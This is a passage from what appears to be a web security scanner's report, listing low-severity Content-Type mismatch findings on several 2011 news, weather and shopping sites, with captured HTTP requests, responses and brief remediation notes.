P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5709


usl.photoUploadUrl="http:/"+"/sitelife.usatoday.com/ver1.0/Photo/PhotoUploadFrame.rails"
usl.photoDetailsUrl="http:/"+"/sitelife.usatoday.com/ver1.0/Photo/PhotoAddDetails.rails"
usl.photoUploadTempla
...[SNIP]...

25.16. http://mobile.fox8live.com/ScriptResource.axd

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mobile.fox8live.com
Path:   /ScriptResource.axd

Issue detail

The response contains the following Content-type statement: Content-Type: text/html; charset=utf-8. The header states that the body is HTML, but the body is JavaScript (var Sys = new Array(); ...). A script resource labelled text/html still executes when loaded through a <script src> tag, but the HTML label is what lets a browser render the response as a page if it is ever navigated to directly or reflects request data, so the ScriptResource.axd handler should declare a JavaScript MIME type.

Request

GET /ScriptResource.axd?d=pMQ-lpEot1tTVlk8V30klJ_A0JoWcJGdQS1rQAiV0HcZl4MzVvDd9HqJJl93TSR_4idYdU_v17EjMyBTV6P8JBp75wCZ_yOc3uN2Kew_7ZuJCK8jXzSrzeBVywI5kheZIuGOhnY4UX70WtRVgSIinwKfa3g1&t=ffffffffb8d25ab8 HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
Referer: http://mobile.fox8live.com/BlackBerry/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:41:47 GMT
Content-Length: 94

var Sys = new Array();Sys.Application = new Array();Sys.Application.initialize = function(){};

25.17. http://radar.weather.gov/Conus/images/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /Conus/images/favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain; charset=iso-8859-1. The header states that the body is plain text; the scanner could not recognise the content. The 318-byte body is a Windows icon (.ico) file: the leading bytes are the 00 00 01 00 ICONDIR signature, and the two '(' characters in the dump are the 0x28 bytes of the image-size field and of the BITMAPINFOHEADER length. Binary data served as text/plain is harmless for a favicon, but it shows the server has no MIME mapping for .ico; image/x-icon (or the registered image/vnd.microsoft.icon) is the correct type.

Request

GET /Conus/images/favicon.ico HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 03 Nov 2006 13:34:08 GMT
Server: Apache
X-Cache-TTL: 85977
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=iso-8859-1
X-Cached-Time: Wed, 06 Apr 2011 16:15:29 GMT
Cache-Control: max-age=77447
Expires: Tue, 10 May 2011 13:07:32 GMT
Date: Mon, 09 May 2011 15:36:45 GMT
Connection: close

..............(.......(....... ...............G...G............R7...f...^......}l.........................iQ...............d.wwuu.Wwwwv~ug.gwwxW..u.ww.....cW|U....UgV~.@...5c...    ..\V......V........U.
...[SNIP]...

25.18. http://radar.weather.gov/images/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /images/favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain; charset=UTF-8. The header states that the body is plain text; the scanner could not recognise the content. As in 25.17, the 318-byte body is a Windows .ico file (00 00 01 00 ICONDIR signature) served without an image MIME type.

Request

GET /images/favicon.ico HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8
Server: Apache
Last-Modified: Wed, 19 Apr 2006 14:34:18 GMT
Date: Mon, 09 May 2011 15:38:01 GMT
Connection: close

..............(.......(....... ........................................5*..hf..v*..p................p............................f......f...........z..~.I.8.........}... ...k....3.?..................1
...[SNIP]...

25.19. http://shop.npr.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shop.npr.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The header states that the body is plain text; the scanner could not recognise the content. The 318-byte body is a Windows .ico file (00 00 01 00 ICONDIR signature, BITMAPINFOHEADER at offset 22) served as text/plain; the server has no MIME mapping for .ico.

Request

GET /favicon.ico HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.1.10.1304955581; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:03 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Fri, 21 Dec 2020 00:00:00 GMT
Cache-Control: public, no-transform
Connection: close
Content-Type: text/plain
Content-Length: 318

..............(.......(....... ...............................................................................................................................    .......    .......    .......    .......    .......    .
...[SNIP]...

25.20. http://shop.npr.org/resize.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shop.npr.org
Path:   /resize.php

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg. The header states that the body is a JPEG image; the scanner could not recognise the content. The body opens with the JPEG SOI/APP0 markers and the JFIF tag, followed by a GD library creator comment, so the declared type is correct and this is a scanner false positive.

Request

GET /resize.php?w=170&h=120&f=images/products/10135.jpg HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://shop.npr.org/?utm_source=topnav&utm_medium=topnav&utm_campaign=topnav
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:43 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: image/jpeg
Content-Length: 9640

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...

25.21. https://shop.npr.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://shop.npr.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The header states that the body is plain text; the scanner could not recognise the content. This is the same 318-byte Windows .ico file as 25.19, fetched over HTTPS, again served as text/plain instead of an image type.

Request

GET /favicon.ico HTTP/1.1
Host: shop.npr.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.7.10.1304955581; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:44:22 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Fri, 21 Dec 2020 00:00:00 GMT
Cache-Control: public, no-transform
Connection: close
Content-Type: text/plain
Content-Length: 318

..............(.......(....... ...............................................................................................................................    .......    .......    .......    .......    .......    .
...[SNIP]...

25.22. https://shop.npr.org/resize.php

Summary

Severity:   Information
Confidence:   Firm
Host:   https://shop.npr.org
Path:   /resize.php

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg. The header states that the body is a JPEG image; the scanner could not recognise the content. As in 25.20, the body begins with the JFIF markers and a GD creator comment, so the declared type is correct and this is a scanner false positive.

Request

GET /resize.php?w=222&h=35&f=content/cache/skins/npr/images/image-logo.jpg HTTP/1.1
Host: shop.npr.org
Connection: keep-alive
Referer: https://shop.npr.org/index.php?pcsid=dd4agnd4un1d3jrdith74nh772&p=one_page_checkout&start=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.7.10.1304955581; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:44:12 GMT
Server: Apache/2.0.52 (Red Hat)
Content-Length: 7788
Connection: close
Content-Type: image/jpeg

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...

25.23. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The response contains the following Content-type statement: Content-Type: application/javascript. The header states that the body is script; the scanner reports that it appears to contain HTML. The body is a JSONP response: a call to the callback named by the cb=plcb0 request parameter whose string argument is an HTML fragment, so the declared type matches how the resource is consumed. Because the callback name is taken from the request, the endpoint should restrict it to a safe identifier pattern; nothing in this response shows whether it does.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:38:33 GMT
Connection: close
Content-Length: 94369

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

25.24. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

Summary

Severity:   Information
Confidence:   Firm
Host:   http://spd.pointroll.com
Path:   /PointRoll/Ads/PRScript.dll

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The header states that the body is plain text, but the body is JavaScript (/*PointRoll.2011 v129*/var priw, ...). Browsers that do not enforce MIME types execute it anyway when it is included via <script src>; browsers honouring X-Content-Type-Options: nosniff refuse a script whose declared type is not a JavaScript MIME type, so this response should declare application/javascript.

Request

GET /PointRoll/Ads/PRScript.dll?v=129&pos=0&init=1&delay=0&push=0&set=2&bye=1 HTTP/1.1
Host: spd.pointroll.com
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-5&r=0.699075760319829&server=polRedir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-Type: text/plain
Content-Length: 12976
Date: Mon, 09 May 2011 15:39:55 GMT
Connection: close

/*PointRoll.2011 v129*/var priw,prih,prz=0,przo=0,prsw=0,prrv=0,prpi=0,prtg=0,prta=1,prpc='',prpf,prcw,prad=0,prca=0,prff=0,prmh=0,prup=0,proto,proto2,prbf=0,proo=0,prgo=0,pria=0,prpdts,prpot=0,prFlag
...[SNIP]...

25.25. http://trc.taboolasyndication.com/usatoday/trc/2/json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/trc/2/json

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain; charset=utf-8. The header states that the body is plain text; the scanner reports that it appears to contain CSS. The body is actually a JavaScript assignment (trc_json_response = {...}) that stores a JSON object in a global for a <script src> consumer, so neither label is accurate and the response should declare application/javascript.

Request

GET /usatoday/trc/2/json?list-id=rbox-t2v&id=746&list-size=3&uim=rbox-t2v&intent=u&uip=rbox-t2v&item-id=46732364&item-type=text&item-url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&page-id=3aaa656500e8a4b6125b0c5e5138f55323e20348&sd=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304954989&uid=d80f7856-eeab-487a-988c-f15ce2ff8eb0&cv=4-6-12-44791-2054596&uiv=default HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304954989; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415;Path=/usatoday/
Set-Cookie: taboola_wv=;Path=/usatoday/;Expires=Tue, 08-May-12 15:36:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 3450

trc_json_response =
{"trc":{"req":"35eb06aeafeca714ebec05bbb325c74c","session-id":"923a143436baa4e0bd9cd36ac2e2bd5f","session-data":"v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2f
...[SNIP]...

25.26. http://widgets.macroaxis.com/widgets/content.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://widgets.macroaxis.com
Path:   /widgets/content.jsp

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=ISO-8859-1. The header states that the body is HTML; the scanner reports plain text. The 47-byte body is a JavaScript callback invocation (MyXssMagic.serverResponse(['1']);), i.e. a JSONP-style script served under an HTML type.

Request

GET /widgets/content.jsp?t=26&f=f&url=http%3A//www.hnedata.net/features/tr_stock_charts HTTP/1.1
Host: widgets.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=4DCCBC38AE7AB60DE732C89671BAF0FB; Path=/
Content-Length: 47
Content-Type: text/html;charset=ISO-8859-1


MyXssMagic.serverResponse(['1']);

25.27. http://wvue.web.entriq.net/nw/dpm/loadplayer/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The header states that the body is HTML, but the body is JavaScript (the DayPort player definition, DayPortPlayerCallBack.DayPortPlayer_0.embed = function() ...). The playerID and domain request parameters appear in the generated script, so the endpoint should declare a JavaScript MIME type and ensure those values are encoded for a script context.

Request

GET /nw/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_0&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:15 GMT
Server: Apache
X-Host: w4
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:38:15 GMT
Content-Type: text/html
Content-Length: 59938

/*
   Player TYPE 2
   DayPort, Inc.
*/
DayPortPlayerCallBack.DayPortPlayer_0.embed = function()
{
   this.version = "201001251308";
   
   this.imageDomain = "wvue.img.entriq.net";
   this.domain = "wvue.web.en
...[SNIP]...

25.28. http://www.collegesurfing.com/js/MGEProgramCategoryDropDown.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.collegesurfing.com
Path:   /js/MGEProgramCategoryDropDown.php

Issue detail

The response contains the following Content-type statement: Content-Type: text/html; charset=UTF-8. The header states that the body is HTML, but the body is JavaScript (grouping = ''; function getCareer(el) ...). PHP defaults to text/html; a script served from a .php file under /js/ should set its own header (for example with header('Content-Type: application/javascript')).

Request

GET /js/MGEProgramCategoryDropDown.php HTTP/1.1
Host: www.collegesurfing.com
Proxy-Connection: keep-alive
Referer: http://www.collegesurfing.com/searchbox-mge-us.php?id=12828088&type=MGEUSDEST&style=&affiliatesearchboxid=7851&program_type=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; PHPSESSID=3eicgiuhi2dvuo76dhkvncnek6; AFF_ID=6; AFF_URL=http%3A%2F%2Fwww.collegesurfing.com%2Fsearchbox-mge-us.php%3Fid%3D12828088%26type%3DMGEUSDEST%26style%3D%26affiliatesearchboxid%3D7851%26program_type%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20756

   grouping = '';

   function getCareer(el){
       if(typeof(el) == "undefined"){
           el = document.mainform;
       }
       if(typeof(el) == "undefined" || typeof(el) == null ){
           return false;
       }
       
       pos = el.pro
...[SNIP]...

25.29. http://www.macroaxis.com/widgets/url.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=ISO-8859-1. The header states that the body is HTML, but the body is JavaScript (function iecheck() ...), served with the JSP default HTML type.

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=189FB444592D30A261C6DE609DF507AC; Path=/
Content-Length: 2449
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...

25.30. http://www.srh.noaa.gov/images/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.srh.noaa.gov
Path:   /images/favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain; charset=UTF-8. The header states that the body is plain text; the scanner could not recognise the content. The 318-byte body is the same Windows .ico file seen in 25.18 (00 00 01 00 ICONDIR signature), here served through a NetCache proxy, again without an image MIME type.

Request

GET /images/favicon.ico HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 118
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:37:22 GMT
Content-Length: 318
Content-Type: text/plain; charset=UTF-8
Server: Apache
Last-Modified: Wed, 19 Apr 2006 14:34:18 GMT
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

..............(.......(....... ........................................5*..hf..v*..p................p............................f......f...........z..~.I.8.........}... ...k....3.?..................1
...[SNIP]...

25.31. http://www.usatoday.com/community/tags/GetLinkedByline.ashx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.usatoday.com
Path:   /community/tags/GetLinkedByline.ashx

Issue detail

The response contains the following Content-type statement: Content-Type: text/html; charset=utf-8. The header states that the body is HTML; the scanner reports plain text. The body is an HTML fragment (a byline built from <a class="linkedBylineName"> links), so the declared type is consistent with the content and this is a scanner false positive.

Request

GET /community/tags/GetLinkedByline.ashx?id=46732364 HTTP/1.1
Host: www.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
